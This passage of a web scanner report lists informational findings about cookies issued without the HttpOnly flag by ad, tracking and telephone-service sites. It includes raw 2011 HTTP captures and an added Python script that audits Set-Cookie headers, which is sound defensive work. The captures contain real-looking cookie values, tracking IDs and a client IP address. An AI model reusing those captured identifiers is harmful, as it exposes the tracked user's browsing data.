P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.107. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.108. http://tr.adinterax.com/re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.109. http://udmserve.net/udm/img.fetch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440343958:2:2900:0:0:63440343958:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Set-Cookie: dt=9b3eab00-120f-460c-84d6-3607c7ca9d48; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Expires: Mon, 05 Sep 2011 12:45:58 GMT
Date: Tue, 06 Sep 2011 12:45:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...

10.110. http://utdi.reachlocal.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?scid=2323693&kw=233292&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:02 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26kw%3D233292; domain=.reachlocal.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.reachlocal.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.reachlocal.com; path=/
Location: http://redirect.rtrk.com/redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26rl_key%3D747249abb89e424959a67c34a59e232e%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520225798%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0
Vary: Accept-Encoding
Content-Length: 1036
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://redirect.rtrk.com/redirect?RL_rurl=http:
...[SNIP]...

10.111. http://utdi.reachlocal.net/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309926%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; domain=.reachlocal.net; path=/
Set-Cookie: RlocalPROXY=RLPROXY%3D; domain=.reachlocal.net; path=/
Set-Cookie: RlocalPROXYLog=RLPROXYLog%3d0; domain=.reachlocal.net; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.reachlocal.net; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1; domain=.reachlocal.net; path=/
Location: /index.html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:59 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/index.html">here</a>.</p>
<hr>
<address>Apache
...[SNIP]...
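
The findings in this section all come from the same check: a Set-Cookie header arrives without the HttpOnly attribute, and the reviewer is then asked to judge whether the cookie carries a session token. The response in 10.111 is a useful specimen because it mixes both cases: five Rlocal* cookies are set without the flag, while the NSC_wt-vtb-qspyz-iuuq cookie in the same response does carry httponly (lower-case, which is still valid since cookie attribute names are case-insensitive). The Python below is an added example, not part of the XSS.Cx report or of the scanner that produced it. It parses a raw HTTP response, reports every cookie missing HttpOnly (and whether Secure is also absent), and applies a simple name/value heuristic for "looks like a session token". That heuristic, the SAMPLE_RESPONSE layout, and the PHPSESSID line are assumptions of this example; the three Set-Cookie lines copied from 10.111 are verbatim from the capture above.

```python
"""Audit Set-Cookie headers in a raw HTTP response for missing HttpOnly/Secure.

Added example for this report, not scanner code. The "session-like" heuristic
below is an assumption of this example, not the scanner's own rule.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Heuristics (assumptions): names that usually carry a session identifier, and
# values that are one long run of token-like characters.
SESSION_NAME_RE = re.compile(r"(sess|sid|token|auth|login)", re.IGNORECASE)
RANDOM_VALUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]{20,}$")


@dataclass
class CookieFinding:
    name: str
    value: str
    httponly: bool
    secure: bool
    attributes: Dict[str, str] = field(default_factory=dict)

    @property
    def looks_like_session(self) -> bool:
        """Weak hint that this cookie is a session token (heuristic, see above)."""
        return bool(SESSION_NAME_RE.search(self.name) or RANDOM_VALUE_RE.match(self.value))


def parse_set_cookie(header_value: str) -> CookieFinding:
    """Parse one Set-Cookie value. Attribute names are matched case-insensitively,
    so 'httponly' (as sent by the NetScaler cookie in 10.111) counts as HttpOnly."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    httponly = secure = False
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        key_l = key.strip().lower()
        if key_l == "httponly":
            httponly = True
        elif key_l == "secure":
            secure = True
        else:
            attrs[key_l] = val.strip()
    return CookieFinding(name.strip(), value.strip(), httponly, secure, attrs)


def audit_response(raw_response: str) -> List[CookieFinding]:
    """Return one finding per Set-Cookie header that lacks HttpOnly."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    findings: List[CookieFinding] = []
    for line in head.splitlines()[1:]:  # skip the status line
        hname, sep, hval = line.partition(":")
        if sep and hname.strip().lower() == "set-cookie":
            cookie = parse_set_cookie(hval.strip())
            if not cookie.httponly:
                findings.append(cookie)
    return findings


def summarize(findings: List[CookieFinding]) -> List[str]:
    """One human-readable line per finding, flagging Secure and session-likeness."""
    lines = []
    for f in findings:
        flags = ["no HttpOnly"]
        if not f.secure:
            flags.append("no Secure")
        if f.looks_like_session:
            flags.append("session-like: review first")
        lines.append(f"{f.name or '<empty name>'}: " + ", ".join(flags))
    return lines


# Sample input. The three Set-Cookie lines are copied verbatim from the 10.111
# response above; the PHPSESSID line is constructed for this example so the
# session heuristic has something to fire on.
SAMPLE_RESPONSE = "\r\n".join([
    "HTTP/1.1 302 Found",
    "Server: Apache",
    "Set-Cookie: RlocalPROXY=RLPROXY%3D; domain=.reachlocal.net; path=/",
    "Set-Cookie: RlocalPROXYLog=RLPROXYLog%3d0; domain=.reachlocal.net; path=/",
    "Location: /index.html",
    "Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;"
    "expires=Tue, 06-Sep-2011 12:16:59 GMT;path=/;httponly",
    "Set-Cookie: PHPSESSID=0123456789abcdef0123456789abcdef; path=/",  # constructed
    "",
    "<html>body omitted</html>",
])

if __name__ == "__main__":
    for line in summarize(audit_response(SAMPLE_RESPONSE)):
        print(line)
```

Run against the sample, the two Rlocal* cookies are reported without HttpOnly or Secure but not as session-like, the NetScaler cookie is skipped because its lower-case httponly is honoured, and the constructed PHPSESSID is flagged for review first. The same parser also copes with the odd `Set-Cookie: =deleted; ...` header in 10.112, reporting it under an empty name rather than crashing.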

10.112. http://video.music.yahoo.com/up/fop/process/getPlaylistFOP.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.music.yahoo.com
Path:   /up/fop/process/getPlaylistFOP.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /up/fop/process/getPlaylistFOP.php?node_id=v221574941&tech=flash&bitrate=&mode=meta&lg=kKGqmIfiMW0IC76O.Yl4nj&vidH=225&vidW=425&lang=us&tf=fop&eventid=1301797 HTTP/1.1
Host: video.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://d.yimg.com/m/up/fop/embedflv/swf/fop.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: =deleted; expires=Mon, 06-Sep-2010 12:49:41 GMT
Set-Cookie: vmyc=1-0; path=/
Cache-Control: private
Connection: close
Content-Type: text/xml; charset=UTF-8
Content-Length: 2224

<DATA>
<PANEL-SETS></PANEL-SETS>
<CUSTOM-DATA TYPE="MUSIC">
<USER><CLIENT_IP>50.23.123.106</CLIENT_IP><BCOOKIE><![CDATA[invalid]]></BCOOKIE><PROPERTY_UID GUEST="1">0</PROPERTY_UID></USER></CUSTOM-DATA
...[SNIP]...

10.113. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000790042/mnum=0000957105/cstr=62371385=_4e6615c4,2458564453,790042^957105^77^0,1_/xsxdata=$xsxdata/bnum=62371385/optn=64?trg= HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:53 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12; expires=Tue, 06-Mar-2012 13:44:53 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1755

<div id="theme180x150A01H1F0L1P0000V1_1Container"> <style type="text/css" media="screen">                                @import url(http://aranet.vo.llnwd.net/o28/themes/css/theme180x150A01H1F0L1P0000V1_1.css);                            </sty
...[SNIP]...

10.114. http://www.aptela.com/mainstylesheet.css/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /mainstylesheet.css/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mainstylesheet.css/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://support.aptela.com:9000/tools/ResetPassword.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326402; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.8.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:26:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326409; expires=Wed, 05-Sep-2012 12:26:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 15669
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> Pag
...[SNIP]...

10.115. http://www.aptela.com/misc/privacy-policy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /misc/privacy-policy/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity, exp_tracker. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. exp_tracker holds a URL-encoded serialized PHP array of recently visited paths, so its contents are client-side state that the application reads back on later requests.

Request

GET /misc/privacy-policy/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; __utma=207344579.967367889.1315327921.1315327921.1315327921.1; __utmc=207344579; __utmz=207344579.1315327921.1.1.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326382; expires=Wed, 05-Sep-2012 12:26:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fmisc%2F404%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2F33c420cd2ee5ef0c134a240a%2FT2V1%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2F33c420cd2c9d489cd0318b99%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:22 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 20963
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title>Privacy Poli
...[SNIP]...

10.116. http://www.aptela.com/my-account/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity, exp_tracker. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my-account/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; exp_last_activity=1315326382; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.2.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326388; expires=Wed, 05-Sep-2012 12:26:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12258
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> My Account
...[SNIP]...

10.117. http://www.aptela.com/my-account/login-error/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/login-error/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity, exp_tracker. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my-account/login-error/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
